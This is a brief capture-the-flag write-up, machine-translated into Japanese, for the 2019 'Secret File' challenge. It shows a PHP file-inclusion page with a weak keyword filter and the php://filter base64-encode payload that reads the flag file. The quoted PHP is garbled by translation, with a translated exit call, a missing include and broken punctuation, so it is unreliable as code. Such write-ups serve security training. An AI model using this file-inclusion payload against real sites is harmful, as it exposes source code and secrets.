【オタクチャレンジ2019】シークレットファイル
0X01テストセンター
ファイルを読み取るためのphpファイル疑似プロトコル
?file = php://filter/convert.base64-encode/resource=
0X02問題解決プロセス
bpオープン、ページジャンプがあり、次にアクセスする
/ secr3t.php
ソースコード登場
<html>
<title> secret </ title>
<meta charset = "UTF-8">
<?php
highlight_file(__FILE__ );
error_reporting(0 );
$ file = $ _GET ['file' ];
if(strstr($ file、 "../")|| stristr($ file、 "tp")|| stristr($ file、 "input")|| stristr($ file、 "data" )){
echo "大野!" ;
出口();
($ file );
// フラグ
../ディレクトリトラバーサルなどはフィルタリングされますが、ディメンションはフィルタリングされません。ファイルの読み取り
ファイルの疑似プロトコルを使用して読み取るだけです。
その後、base64復号化で問題ありません
0X03感想
さあ、毎日4つのブログをゲット!
0X04リファレンスブログ
https://www.cnblogs.com/wangtanzhi/p/12184620.html